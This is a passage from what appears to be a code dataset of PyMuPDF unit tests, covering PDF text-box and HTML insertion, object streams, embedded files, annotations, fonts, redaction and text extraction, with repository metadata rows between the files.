        app.alert('You selected: ' + value);
        //var group_id = optional_content_group_ids[value];
    """
    # Insert the combo box into the page
    # https://pymupdf.readthedocs.io/en/latest/page.html#Page.add_widget
    page.add_widget(combo_box)
    # Create optional content groups
    # https://github.com/pymupdf/PyMuPDF-Utilities/blob/master/jupyter-notebooks/optional-content.ipynb
    # Load images and create OCGs for each
    optional_content_group_ids = {}
    for i, item in enumerate(combo_items):
        optional_content_group_id = doc.add_ocg(item, on=False)
        optional_content_group_ids[item] = optional_content_group_id
        rect = pymupdf.Rect(50, 100, 250, 300)
        image_file_name = f'{item}.png'
        # xref = page.insert_image(
        #     rect,
        #     filename=image_file_name,
        #     oc=optional_content_group_id,
        # )
    first_id = optional_content_group_ids['first']
    second_id = optional_content_group_ids['second']
    third_id = optional_content_group_ids['third']
    # https://pymupdf.readthedocs.io/en/latest/document.html#Document.set_layer
    doc.set_layer(-1, basestate="OFF")
    layers = doc.get_layer()
    doc.set_layer(config=-1, on=[first_id])
    # https://pymupdf.readthedocs.io/en/latest/document.html#Document.set_layer_ui_config
    # configs = doc.layer_ui_configs()
    # doc.set_layer_ui_config(0, pymupdf.PDF_OC_ON)
    # doc.set_layer_ui_config('third', action=2)
    # Save the PDF
    doc.save(os.path.abspath(f'{__file__}/../../tests/test_3180.pdf'))
    doc.close()
| 4,629 | Python | .py | 109 | 37.266055 | 103 | 0.641203 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,341 | test_textbox.py | pymupdf_PyMuPDF/tests/test_textbox.py | """
Fill a given text in a rectangle on some PDF page using
1. TextWriter object
2. Basic text output
Check text is indeed contained in given rectangle.
"""
import pymupdf
# Sample (German) paragraph used as fill text by the textbox tests below.
text = """Der Kleine Schwertwal (Pseudorca crassidens), auch bekannt als Unechter oder Schwarzer Schwertwal, ist eine Art der Delfine (Delphinidae) und der einzige rezente Vertreter der Gattung Pseudorca.
Er ähnelt dem Orca in Form und Proportionen, ist aber einfarbig schwarz und mit einer Maximallänge von etwa sechs Metern deutlich kleiner.
Kleine Schwertwale bilden Schulen von durchschnittlich zehn bis fünfzig Tieren, wobei sie sich auch mit anderen Delfinen vergesellschaften und sich meistens abseits der Küsten aufhalten.
Sie sind in allen Ozeanen gemäßigter, subtropischer und tropischer Breiten beheimatet, sind jedoch vor allem in wärmeren Jahreszeiten auch bis in die gemäßigte bis subpolare Zone südlich der Südspitze Südamerikas, vor Nordeuropa und bis vor Kanada anzutreffen."""
def test_textbox1():
    """Use TextWriter for text insertion."""
    doc = pymupdf.open()
    page = doc.new_page()
    rect = pymupdf.Rect(50, 50, 400, 400)
    writer = pymupdf.TextWriter(page.rect, color=(0, 0, 1))
    writer.fill_textbox(rect, text, align=pymupdf.TEXT_ALIGN_LEFT, fontsize=12)
    writer.write_text(page, morph=(rect.tl, pymupdf.Matrix(1, 1)))
    # All text on the page must lie inside the target rectangle.
    assert page.get_text() == page.get_text(clip=rect)
    page.write_text(writers=writer)
def test_textbox2():
    """Use basic text insertion."""
    doc = pymupdf.open()
    ocg = doc.add_ocg("ocg1")
    page = doc.new_page()
    rect = pymupdf.Rect(50, 50, 400, 400)
    light_blue = pymupdf.utils.getColor("lightblue")
    pymupdf.utils.getColorHSV("red")  # coverage of the HSV color lookup
    page.insert_textbox(
        rect,
        text,
        align=pymupdf.TEXT_ALIGN_LEFT,
        fontsize=12,
        color=light_blue,
        oc=ocg,
    )
    # All text on the page must lie inside the target rectangle.
    assert page.get_text() == page.get_text(clip=rect)
def test_textbox3():
    """TextWriter insertion with a CJK font and right-to-left filling."""
    doc = pymupdf.open()
    page = doc.new_page()
    rect = pymupdf.Rect(50, 50, 400, 400)
    writer = pymupdf.TextWriter(page.rect, color=(0, 0, 1))
    writer.fill_textbox(
        rect,
        text,
        align=pymupdf.TEXT_ALIGN_LEFT,
        font=pymupdf.Font("cjk"),
        fontsize=12,
        right_to_left=True,
    )
    writer.write_text(page, morph=(rect.tl, pymupdf.Matrix(1, 1)))
    # All text on the page must lie inside the target rectangle.
    assert page.get_text() == page.get_text(clip=rect)
    doc.scrub()
    doc.subset_fonts()
def test_textbox4():
    """TextWriter output written under an optional content group."""
    doc = pymupdf.open()
    ocg = doc.add_ocg("ocg1")
    page = doc.new_page()
    rect = pymupdf.Rect(50, 50, 400, 600)
    writer = pymupdf.TextWriter(page.rect, color=(0, 0, 1))
    writer.fill_textbox(
        rect,
        text,
        align=pymupdf.TEXT_ALIGN_LEFT,
        fontsize=12,
        font=pymupdf.Font("cour"),
        right_to_left=True,
    )
    writer.write_text(page, oc=ocg, morph=(rect.tl, pymupdf.Matrix(1, 1)))
    # All text on the page must lie inside the target rectangle.
    assert page.get_text() == page.get_text(clip=rect)
def test_textbox5():
    """Using basic text insertion: shrink the font until the text fits."""
    # Remember and restore the global small-glyph-heights setting.
    small_glyph_heights0 = pymupdf.TOOLS.set_small_glyph_heights()
    pymupdf.TOOLS.set_small_glyph_heights(True)
    try:
        doc = pymupdf.open()
        page = doc.new_page()
        r = pymupdf.Rect(100, 100, 150, 150)
        text = "words and words and words and more words..."
        rc = -1
        fontsize = 12
        page.draw_rect(r)
        # insert_textbox returns < 0 while the text does not fit; reduce the
        # font size until it does.
        while rc < 0:
            rc = page.insert_textbox(
                r,
                text,
                fontsize=fontsize,
                align=pymupdf.TEXT_ALIGN_JUSTIFY,
            )
            fontsize -= 0.5
        blocks = page.get_text("blocks")
        bbox = pymupdf.Rect(blocks[0][:4])
        # The inserted text must stay inside the rectangle.
        assert bbox in r
    finally:
        # Must restore small_glyph_heights, otherwise other tests can fail.
        pymupdf.TOOLS.set_small_glyph_heights(small_glyph_heights0)
def test_2637():
    """Ensure correct calculation of fitting text."""
    doc = pymupdf.open()
    page = doc.new_page()
    text = (
        "The morning sun painted the sky with hues of orange and pink. "
        "Birds chirped harmoniously, greeting the new day. "
        "Nature awakened, filling the air with life and promise."
    )
    rect = pymupdf.Rect(50, 50, 500, 280)
    # Find the largest font size at which the text still fits.
    fontsize = 50
    while page.insert_textbox(rect, text, fontname="hebo", fontsize=fontsize) < 0:
        fontsize -= 1
    # Confirm the text does not leak outside the rectangle.
    blocks = page.get_text("blocks")
    bbox = pymupdf.Rect(blocks[0][:4])
    assert bbox in rect
def test_htmlbox1():
    """Write HTML-styled text into a rect with different rotations.
    The text is styled and contains a link.
    Then extract the text again, and
    - assert that text was written in the 4 different angles,
    - assert that text properties are correct (bold, italic, color),
    - assert that the link has been correctly inserted.
    We try to insert into a rectangle that is too small, setting
    scale=False and confirming we have a negative return code.
    """
    if not hasattr(pymupdf, "mupdf"):
        print("'test_htmlbox1' not executed in classic.")
        return
    rect = pymupdf.Rect(100, 100, 200, 200)  # this only works with scale=True
    base_text = """Lorem ipsum dolor sit amet, consectetur adipisici elit, sed eiusmod tempor incidunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquid ex ea commodi consequat. Quis aute iure reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint obcaecat cupiditat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum."""
    text = """Lorem ipsum dolor sit amet, consectetur adipisici elit, sed eiusmod tempor incidunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation <b>ullamco</b> <i>laboris</i> nisi ut aliquid ex ea commodi consequat. Quis aute iure reprehenderit in <span style="color: #0f0;font-weight:bold;">voluptate</span> velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint obcaecat cupiditat non proident, sunt in culpa qui <a href="https://www.artifex.com">officia</a> deserunt mollit anim id est laborum."""
    doc = pymupdf.Document()
    for rot in (0, 90, 180, 270):
        wdirs = ((1, 0), (0, -1), (-1, 0), (0, 1))  # all writing directions
        page = doc.new_page()
        # Without scaling the rect is too small: negative return code.
        spare_height, scale = page.insert_htmlbox(rect, text, rotate=rot, scale_low=1)
        assert spare_height < 0
        assert scale == 1
        # With scaling allowed the text must fit exactly, scaled down.
        spare_height, scale = page.insert_htmlbox(rect, text, rotate=rot, scale_low=0)
        assert spare_height == 0
        assert 0 < scale < 1
        page = doc.reload_page(page)
        link = page.get_links()[0]  # extracts the links on the page
        assert link["uri"] == "https://www.artifex.com"
        # Assert plain text is complete.
        # We must remove line breaks and any ligatures for this.
        assert base_text == page.get_text(flags=0)[:-1].replace("\n", " ")
        encounters = 0  # counts the words with selected properties
        for b in page.get_text("dict")["blocks"]:
            for l in b["lines"]:
                wdir = l["dir"]  # writing direction
                assert wdir == wdirs[page.number]
                for s in l["spans"]:
                    stext = s["text"]
                    color = pymupdf.sRGB_to_pdf(s["color"])
                    bold = bool(s["flags"] & 16)
                    italic = bool(s["flags"] & 2)
                    if stext in ("ullamco", "laboris", "voluptate"):
                        encounters += 1
                    if stext == "ullamco":
                        assert bold is True
                        assert italic is False
                        assert color == pymupdf.pdfcolor["black"]
                    elif stext == "laboris":
                        assert bold is False
                        assert italic is True
                        assert color == pymupdf.pdfcolor["black"]
                    elif stext == "voluptate":
                        assert bold is True
                        assert italic is False
                        assert color == pymupdf.pdfcolor["green"]
                    else:
                        assert bold is False
                        assert italic is False
        # all 3 special words were encountered
        assert encounters == 3
def test_htmlbox2():
    """Insert HTML without scaling; layout must be rotation-independent.

    For every page rotation the text must fit unscaled (scale == 1) and
    leave the identical amount of unused height in the target rectangle.
    """
    if not hasattr(pymupdf, "mupdf"):
        print("'test_htmlbox2' not executed in classic.")
        return
    document = pymupdf.open()
    target = pymupdf.Rect(100, 100, 200, 200)  # comfortably larger than the text
    page = document.new_page()
    spare_heights = []
    for rotation in (0, 90, 180, 270):
        spare, factor = page.insert_htmlbox(
            target, "Hello, World!", scale_low=1, rotate=rotation
        )
        # scale_low=1 forbids shrinking, so the text must have fit as-is
        assert factor == 1
        assert 0 < spare < target.height
        spare_heights.append(spare)
    # every rotation must leave exactly the same unused height
    assert len(set(spare_heights)) == 1
def test_htmlbox3():
    """Insert HTML with an opacity value and verify it via get_texttrace()."""
    if not hasattr(pymupdf, "mupdf"):
        print("'test_htmlbox3' not executed in classic.")
        return
    document = pymupdf.open()
    page = document.new_page()
    html = """<span style="color:red;font-size:20px;">Just some text.</span>"""
    box = pymupdf.Rect(100, 250, 300, 350)
    # insert the text half-transparent
    page.insert_htmlbox(box, html, opacity=0.5)
    # low-level extraction exposes the opacity of the inserted span
    first_span = page.get_texttrace()[0]
    assert first_span["opacity"] == 0.5
def test_3559():
    """Inserting an HTML box containing only an empty heading must not crash."""
    if pymupdf.mupdf_version_tuple < (1, 24, 4):
        print('test_3559(): Not running because mupdf known to SEGV.')
        return
    document = pymupdf.Document()
    page = document.new_page()
    # empty <h3> element used to trigger a SEGV in older MuPDF versions
    page.insert_htmlbox(pymupdf.Rect(100, 100, 200, 200), """<body><h3></h3></body>""")
def test_3916():
    """A rectangle too small even for the scaled text must yield spare_height == -1."""
    document = pymupdf.open()
    page = document.new_page()
    tiny = pymupdf.Rect(100, 100, 101, 101)  # Too small for the text.
    spare, factor = page.insert_htmlbox(tiny, "Hello, World!", scale_low=0.5)
    assert spare == -1
| 10,628 | Python | .py | 238 | 36.264706 | 549 | 0.627479 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,342 | test_docs_samples.py | pymupdf_PyMuPDF/tests/test_docs_samples.py | '''
Test sample scripts in docs/samples/.
'''
import glob
import os
import pytest
import runpy
# We only look at sample scripts that can run standalone (i.e. don't require
# sys.argv).
#
# Repository root (this file lives in <root>/tests/).
root = os.path.abspath(f'{__file__}/../..')
# Relative paths of all runnable sample scripts found in docs/samples/.
samples = []
for p in glob.glob(f'{root}/docs/samples/*.py'):
    # Skip scripts that cannot run standalone (need sys.argv or a GUI).
    if os.path.basename(p) in (
            'make-bold.py',  # Needs sys.argv[1].
            'multiprocess-gui.py',  # GUI.
            'multiprocess-render.py',  # Needs sys.argv[1].
            'text-lister.py',  # Needs sys.argv[1].
            ):
        print(f'Not testing: {p}')
    else:
        p = os.path.relpath(p, root)
        samples.append(p)
def _test_all():
    # Allow running tests directly without pytest.
    import subprocess
    import sys
    e = 0  # number of failed sample scripts
    for sample in samples:
        print( f'Running: {sample}', flush=1)
        try:
            if 0:
                # Disabled alternative: run each sample in a subprocess.
                # Curiously this fails in an odd way when testing compound
                # package with $PYTHONPATH set.
                print( f'os.environ is:')
                for n, v in os.environ.items():
                    print( f'    {n}: {v!r}')
                command = f'{sys.executable} {sample}'
                print( f'command is: {command!r}')
                sys.stdout.flush()
                subprocess.check_call( command, shell=1, text=1)
            else:
                # Run the sample in-process.
                runpy.run_path(sample)
        except Exception:
            print( f'Failed: {sample}')
            e += 1
    # Report failures only after all samples were attempted.
    if e:
        raise Exception( f'Errors: {e}')
# We use pytest.mark.parametrize() to run sample scripts via a fn, which
# ensures that pytest treats each script as a test.
#
@pytest.mark.parametrize('sample', samples)
def test_docs_samples(sample):
    """Run one documentation sample script as its own pytest test."""
    runpy.run_path(f'{root}/{sample}')
| 1,801 | Python | .py | 55 | 24.909091 | 76 | 0.565442 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,343 | test_objectstreams.py | pymupdf_PyMuPDF/tests/test_objectstreams.py | import pymupdf
def test_objectstream1():
    """Test save option "use_objstms".

    This option compresses PDF object definitions into a special object type
    "ObjStm". We test its presence by searching for that /Type.
    """
    if not hasattr(pymupdf, "mupdf"):
        # only implemented for rebased
        return
    # build an arbitrary one-page document with some content
    document = pymupdf.open()
    page = document.new_page()
    page.insert_htmlbox((50, 50, 200, 500), "Hello, World! Hallo, Welt!")
    _ = document.write(use_objstms=True)
    # at least one xref must now hold an object stream
    found = any(
        "/Type/ObjStm" in document.xref_object(xref, compressed=True)
        for xref in range(1, document.xref_length())
    )
    assert found, "No object stream found"
def test_objectstream2():
    """Test save option "use_objstms".

    With use_objstms=False no object of /Type/ObjStm may be generated.
    """
    if not hasattr(pymupdf, "mupdf"):
        # only implemented for rebased
        return
    # build an arbitrary one-page document with some content
    document = pymupdf.open()
    page = document.new_page()
    page.insert_htmlbox((50, 50, 200, 500), "Hello, World! Hallo, Welt!")
    _ = document.write(use_objstms=False)
    # no xref may hold an object stream
    found = any(
        "/Type/ObjStm" in document.xref_object(xref, compressed=True)
        for xref in range(1, document.xref_length())
    )
    assert not found, "Unexpected: Object stream found!"
def test_objectstream3():
    """Test ez_save().

    ez_save() should automatically use object streams.
    """
    if not hasattr(pymupdf, "mupdf"):
        # only implemented for rebased
        return
    import io
    memory_file = io.BytesIO()
    # build an arbitrary one-page document with some content
    document = pymupdf.open()
    page = document.new_page()
    page.insert_htmlbox((50, 50, 200, 500), "Hello, World! Hallo, Welt!")
    document.ez_save(memory_file)  # save PDF to memory
    # at least one xref must now hold an object stream
    found = any(
        "/Type/ObjStm" in document.xref_object(xref, compressed=True)
        for xref in range(1, document.xref_length())
    )
    assert found, "No object stream found!"
| 2,432 | Python | .py | 68 | 29.367647 | 76 | 0.642827 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,344 | test_embeddedfiles.py | pymupdf_PyMuPDF/tests/test_embeddedfiles.py | """
Tests for PDF EmbeddedFiles functions.
"""
import pymupdf
def test_embedded1():
    """Round-trip the embedded-files API: add, list, info, update, get, delete."""
    payload = b"123456678790qwexcvnmhofbnmfsdg4589754uiofjkb-"
    document = pymupdf.open()
    document.embfile_add(
        "file1",
        payload,
        filename="testfile.txt",
        ufilename="testfile-u.txt",
        desc="Description of some sort",
    )
    # exactly one embedded file, retrievable by name and index
    assert document.embfile_count() == 1
    assert document.embfile_names() == ["file1"]
    assert document.embfile_info(0)["name"] == "file1"
    # update the stored filename and verify
    document.embfile_upd(0, filename="new-filename.txt")
    assert document.embfile_info(0)["filename"] == "new-filename.txt"
    # content must come back unchanged
    assert document.embfile_get(0) == payload
    # deleting the entry empties the collection again
    document.embfile_del(0)
    assert document.embfile_count() == 0
21,345 | test_general.py | pymupdf_PyMuPDF/tests/test_general.py | # encoding utf-8
"""
* Confirm sample doc has no links and no annots.
* Confirm proper release of file handles via Document.close()
* Confirm properly raising exceptions in document creation
"""
import io
import os
import pymupdf
import pathlib
import pickle
import platform
import re
import subprocess
import sys
import textwrap
import time
import gentle_compare
# Directory containing this test file; resource PDFs live in a subdirectory.
scriptdir = os.path.abspath(os.path.dirname(__file__))
# Default sample document used by several simple property tests below.
filename = os.path.join(scriptdir, "resources", "001003ED.pdf")
def test_haslinks():
    """The sample document must contain no links."""
    doc = pymupdf.open(filename)
    # idiom fix: direct truthiness assert instead of "== False"
    assert not doc.has_links()


def test_hasannots():
    """The sample document must contain no annotations."""
    doc = pymupdf.open(filename)
    assert not doc.has_annots()


def test_haswidgets():
    """The sample document must not be a form PDF."""
    doc = pymupdf.open(filename)
    assert not doc.is_form_pdf


def test_isrepaired():
    """Opening the sample document must not require a repair."""
    doc = pymupdf.open(filename)
    assert not doc.is_repaired
    # drain any accumulated MuPDF warnings so later tests start clean
    pymupdf.TOOLS.mupdf_warnings()


def test_isdirty():
    """A freshly opened document must not be flagged as modified."""
    doc = pymupdf.open(filename)
    assert not doc.is_dirty


def test_cansaveincrementally():
    """The sample document must support incremental saves."""
    doc = pymupdf.open(filename)
    assert doc.can_save_incrementally()
def test_iswrapped():
    # The sample page's contents are already wrapped in q/Q.
    doc = pymupdf.open(filename)
    page = doc[0]
    assert page.is_wrapped


def test_wrapcontents():
    """Exercise the wrap / read / update / set-contents round trip."""
    doc = pymupdf.open(filename)
    page = doc[0]
    page.wrap_contents()  # ensure contents are enclosed in q/Q
    xref = page.get_contents()[0]  # xref of the first contents object
    cont = page.read_contents()  # concatenation of all contents streams
    doc.update_stream(xref, cont)  # put everything into the first object
    page.set_contents(xref)  # ... and make it the only one
    assert len(page.get_contents()) == 1
    page.clean_contents()
    rebased = hasattr(pymupdf, 'mupdf')
    if rebased:
        # cleaning is expected to emit exactly this MuPDF warning
        wt = pymupdf.TOOLS.mupdf_warnings()
        assert wt == 'PDF stream Length incorrect'
def test_page_clean_contents():
    """Assert that page contents cleaning actually is invoked."""
    doc = pymupdf.open()
    page = doc.new_page()
    # draw two rectangles - will lead to two /Contents objects
    page.draw_rect((10, 10, 20, 20))
    page.draw_rect((20, 20, 30, 30))
    assert len(page.get_contents()) == 2
    # idiom fix: direct truthiness asserts instead of "== False" / "== True"
    assert not page.read_contents().startswith(b"q")
    # clean / consolidate into one /Contents object
    page.clean_contents()
    assert len(page.get_contents()) == 1
    assert page.read_contents().startswith(b"q")


def test_annot_clean_contents():
    """Assert that annot contents cleaning actually is invoked."""
    doc = pymupdf.open()
    page = doc.new_page()
    annot = page.add_highlight_annot((10, 10, 20, 20))
    # the annotation appearance will not start with command b"q";
    # invoke appearance stream cleaning and reformatting
    annot.clean_contents()
    # appearance stream should now indeed start with command b"q"
    assert annot._getAP().startswith(b"q")
def test_config():
    """The 'py-memory' build flag must be a plain boolean."""
    assert pymupdf.TOOLS.fitz_config["py-memory"] in (True, False)


def test_glyphnames():
    """Glyph-name <-> Unicode conversion must round-trip."""
    codepoint = pymupdf.glyph_name_to_unicode("infinity")
    assert pymupdf.unicode_to_glyph_name(codepoint) == "infinity"


def test_rgbcodes():
    """sRGB white must map to unit RGB floats and 255-based RGB ints."""
    white = 0xFFFFFF
    assert pymupdf.sRGB_to_pdf(white) == (1, 1, 1)
    assert pymupdf.sRGB_to_rgb(white) == (255, 255, 255)


def test_pdfstring():
    """PDF string helpers must accept non-Latin and accented text."""
    pymupdf.get_pdf_now()
    pymupdf.get_pdf_str("Beijing, chinesisch 北京")
    pymupdf.get_text_length("Beijing, chinesisch 北京", fontname="china-s")
    pymupdf.get_pdf_str("Latin characters êßöäü")
def test_open_exceptions():
try:
doc = pymupdf.open(filename, filetype="xps")
except RuntimeError as e:
assert repr(e).startswith("FileDataError")
try:
doc = pymupdf.open(filename, filetype="xxx")
except Exception as e:
assert repr(e).startswith("ValueError")
try:
doc = pymupdf.open("x.y")
except Exception as e:
assert repr(e).startswith("FileNotFoundError")
try:
doc = pymupdf.open("pdf", b"")
except RuntimeError as e:
assert repr(e).startswith("EmptyFileError")
def test_bug1945():
    """Saving with clean=True to a memory buffer must not raise (bug 1945)."""
    document = pymupdf.open(f'{scriptdir}/resources/bug1945.pdf')
    sink = io.BytesIO()
    document.save(sink, clean=True)


def test_bug1971():
    """Open / draw / close twice in a row; the document must really close."""
    for attempt in (1, 2):
        document = pymupdf.Document(f'{scriptdir}/resources/bug1971.pdf')
        first_page = next(document.pages())
        first_page.get_drawings()
        document.close()
        assert document.is_closed


def test_default_font():
    """The no-argument Font() constructor yields Noto Serif Regular."""
    expected = "Font('Noto Serif Regular')"
    font = pymupdf.Font()
    assert str(font) == expected
    assert repr(font) == expected
def test_add_ink_annot():
    """Add an ink annotation made of two sine/cosine polylines and save it."""
    import math
    document = pymupdf.Document()
    page = document.new_page()
    # sample two full turns in 15-degree steps
    angles = range(0, 360 * 2, 15)
    cosine_line = [(a, 300 + 200 * math.cos(a * math.pi / 180)) for a in angles]
    sine_line = [(a, 300 + 100 * math.sin(a * math.pi / 180)) for a in angles]
    page.add_ink_annot([cosine_line, sine_line])
    page.insert_text((100, 72), 'Hello world')
    page.add_text_annot((200, 200), "Some Text")
    page.get_bboxlog()
    path = f'{scriptdir}/resources/test_add_ink_annot.pdf'
    document.save(path)
    print(f'Have saved to: path={path!r}')
def test_techwriter_append():
    """Append text via TextWriter and visualize text_rect / last_point."""
    print(pymupdf.__doc__)
    doc = pymupdf.open()
    page = doc.new_page()
    tw = pymupdf.TextWriter(page.rect)
    text = "Red rectangle = TextWriter.text_rect, blue circle = .last_point"
    r = tw.append((100, 100), text)
    print(f'r={r!r}')
    tw.write_text(page)
    # visualize the two TextWriter attributes on the page
    page.draw_rect(tw.text_rect, color=pymupdf.pdfcolor["red"])
    page.draw_circle(tw.last_point, 2, color=pymupdf.pdfcolor["blue"])
    path = f"{scriptdir}/resources/test_techwriter_append.pdf"
    doc.ez_save(path)
    print( f'Have saved to: {path}')


def test_opacity():
    """Create two overlapping circle annotations with different opacities."""
    doc = pymupdf.open()
    page = doc.new_page()
    annot1 = page.add_circle_annot((50, 50, 100, 100))
    annot1.set_colors(fill=(1, 0, 0), stroke=(1, 0, 0))
    annot1.set_opacity(2 / 3)
    annot1.update(blend_mode="Multiply")
    annot2 = page.add_circle_annot((75, 75, 125, 125))
    annot2.set_colors(fill=(0, 0, 1), stroke=(0, 0, 1))
    annot2.set_opacity(1 / 3)
    annot2.update(blend_mode="Multiply")
    outfile = f'{scriptdir}/resources/opacity.pdf'
    doc.save(outfile, expand=True, pretty=True)
    print("saved", outfile)
def test_get_text_dict():
    """get_text('dict') output must be JSON-serializable (no opaque types)."""
    import json
    document = pymupdf.open(f'{scriptdir}/resources/v110-changes.pdf')
    blocks = document[0].get_text("dict")["blocks"]
    # json.dumps() raises if any opaque type is present in `blocks`
    json.dumps(blocks, indent=4)


def test_font():
    """Exercise Font repr and glyph_bbox()."""
    font = pymupdf.Font()
    print(repr(font))
    bbox = font.glyph_bbox(65)
    print(f'bbox={bbox!r}')


def test_insert_font():
    """Page.insert_font() on an existing page must return without error."""
    document = pymupdf.open(f'{scriptdir}/resources/v110-changes.pdf')
    first_page = document[0]
    result = first_page.insert_font()
    print(f'page.insert_font() => {result}')


def test_2173():
    """Repeatedly creating Pixmaps must not crash (issue 2173)."""
    from pymupdf import IRect, Pixmap, CS_RGB, Colorspace
    for _ in range(100):
        Pixmap(Colorspace(CS_RGB), IRect(0, 0, 13, 37))
    print('test_2173() finished')
def test_texttrace():
    """Time get_texttrace() over all pages, then dump the data to a file."""
    import time
    document = pymupdf.Document( f'{scriptdir}/resources/joined.pdf')
    t = time.time()
    for page in document:
        tt = page.get_texttrace()
    t = time.time() - t
    print( f'test_texttrace(): t={t!r}')
    # Repeat, this time writing data to file.
    import json
    path = f'{scriptdir}/resources/test_texttrace.txt'
    print( f'test_texttrace(): Writing to: {path}')
    with open( path, 'w') as f:
        for i, page in enumerate(document):
            tt = page.get_texttrace()
            print( f'page {i} json:\n{json.dumps(tt, indent="    ")}', file=f)


def test_2533():
    """Assert correct char bbox in page.get_texttrace().

    Search for a unique char on page and confirm that page.get_texttrace()
    returns the same bbox as the search method.
    """
    if hasattr(pymupdf, 'mupdf') and not pymupdf.g_use_extra:
        print('Not running test_2533() because rebased with use_extra=0 known to fail')
        return
    # small-glyph-heights mode makes texttrace and search bboxes comparable
    pymupdf.TOOLS.set_small_glyph_heights(True)
    try:
        doc = pymupdf.open(os.path.join(scriptdir, "resources", "test_2533.pdf"))
        page = doc[0]
        NEEDLE = "民"
        ord_NEEDLE = ord(NEEDLE)
        # locate the needle character in the low-level texttrace data
        for span in page.get_texttrace():
            for char in span["chars"]:
                if char[0] == ord_NEEDLE:
                    bbox = pymupdf.Rect(char[3])
                    break
        bbox2 = page.search_for(NEEDLE)[0]
        assert bbox2 == bbox, f'{bbox=} {bbox2=} {bbox2-bbox=}.'
    finally:
        # always restore the global mode for subsequent tests
        pymupdf.TOOLS.set_small_glyph_heights(False)


def test_2645():
    """Assert same font size calculation in corner cases.
    """
    folder = os.path.join(scriptdir, "resources")
    files = ("test_2645_1.pdf", "test_2645_2.pdf", "test_2645_3.pdf")
    for f in files:
        doc = pymupdf.open(os.path.join(folder, f))
        page = doc[0]
        # font size as reported by the two extraction code paths must agree
        fontsize0 = page.get_texttrace()[0]["size"]
        fontsize1 = page.get_text("dict", flags=pymupdf.TEXTFLAGS_TEXT)["blocks"][0]["lines"][
            0
        ]["spans"][0]["size"]
        assert abs(fontsize0 - fontsize1) < 1e-5


def test_2506():
    """Ensure expected font size across text writing angles."""
    doc = pymupdf.open()
    page = doc.new_page()
    point = pymupdf.Point(100, 300)  # insertion point
    fontsize = 11  # fontsize
    text = "Hello"  # text
    angles = (0, 30, 60, 90, 120)  # some angles
    # write text with different angles
    for angle in angles:
        page.insert_text(
            point, text, fontsize=fontsize, morph=(point, pymupdf.Matrix(angle))
        )
    # ensure correct fontsize for get_texttrace() - forgiving rounding problems
    for span in page.get_texttrace():
        print(span["dir"])
        assert round(span["size"]) == fontsize
    # ensure correct fontsize for get_text() - forgiving rounding problems
    for block in page.get_text("dict")["blocks"]:
        for line in block["lines"]:
            print(line["dir"])
            for span in line["spans"]:
                print(span["size"])
                assert round(span["size"]) == fontsize
def test_2108():
    """Redacting a found string must leave the remaining text intact (issue 2108)."""
    doc = pymupdf.open(f'{scriptdir}/resources/test_2108.pdf')
    page = doc[0]
    areas = page.search_for("{sig}")
    rect = areas[0]
    page.add_redact_annot(rect)
    page.apply_redactions()
    text = page.get_text()
    # expected page text after redaction (UTF-8 encoded German letter)
    text_expected = b'Frau\nClaire Dunphy\nTeststra\xc3\x9fe 5\n12345 Stadt\nVertragsnummer: 12345\nSehr geehrte Frau Dunphy,\nText\nMit freundlichen Gr\xc3\xbc\xc3\x9fen\nTestfirma\nVertrag:\n 12345\nAnsprechpartner:\nJay Pritchet\nTelefon:\n123456\nE-Mail:\ntest@test.de\nDatum:\n07.12.2022\n'.decode('utf8')
    if 1:
        # Verbose info.
        print(f'test_2108(): text is:\n{text}')
        print(f'')
        print(f'test_2108(): repr(text) is:\n{text!r}')
        print(f'')
        print(f'test_2108(): repr(text.encode("utf8")) is:\n{text.encode("utf8")!r}')
        print(f'')
        print(f'test_2108(): text_expected is:\n{text_expected}')
        print(f'')
        print(f'test_2108(): repr(text_expected) is:\n{text_expected!r}')
        print(f'')
        print(f'test_2108(): repr(text_expected.encode("utf8")) is:\n{text_expected.encode("utf8")!r}')
        ok1 = (text == text_expected)
        ok2 = (text.encode("utf8") == text_expected.encode("utf8"))
        ok3 = (repr(text.encode("utf8")) == repr(text_expected.encode("utf8")))
        print(f'')
        print(f'ok1={ok1}')
        print(f'ok2={ok2}')
        print(f'ok3={ok3}')
        print(f'')
        print(f'{pymupdf.mupdf_version_tuple=}')
    # the underlying MuPDF bug was fixed in 1.21.2
    if pymupdf.mupdf_version_tuple >= (1, 21, 2):
        print('Asserting text==text_expected')
        assert text == text_expected
    else:
        print('Asserting text!=text_expected')
        assert text != text_expected


def test_2238():
    """Text of first and last page must be extractable from a damaged PDF."""
    filepath = f'{scriptdir}/resources/test2238.pdf'
    doc = pymupdf.open(filepath)
    rebased = hasattr(pymupdf, 'mupdf')
    if rebased:
        # opening the damaged file must produce exactly these repair warnings
        wt = pymupdf.TOOLS.mupdf_warnings()
        assert wt == (
                'format error: cannot recognize version marker\n'
                'trying to repair broken xref\n'
                'repairing PDF document'
                ), f'{wt=}'
    # extraction with an explicit infinite clip ...
    first_page = doc.load_page(0).get_text('text', pymupdf.INFINITE_RECT())
    last_page = doc.load_page(-1).get_text('text', pymupdf.INFINITE_RECT())
    print(f'first_page={first_page!r}')
    print(f'last_page={last_page!r}')
    assert first_page == 'Hello World\n'
    assert last_page == 'Hello World\n'
    # ... and with the default clip must yield the same result
    first_page = doc.load_page(0).get_text('text')
    last_page = doc.load_page(-1).get_text('text')
    print(f'first_page={first_page!r}')
    print(f'last_page={last_page!r}')
    assert first_page == 'Hello World\n'
    assert last_page == 'Hello World\n'
def test_2093():
    """A redaction with fill color must not disturb the rest of the page.

    Verified by comparing the page's average pixel color before/after.
    """
    doc = pymupdf.open(f'{scriptdir}/resources/test2093.pdf')
    def average_color(page):
        # Mean value per color component over all pixels of the rendered page.
        pixmap = page.get_pixmap()
        p_average = [0] * pixmap.n
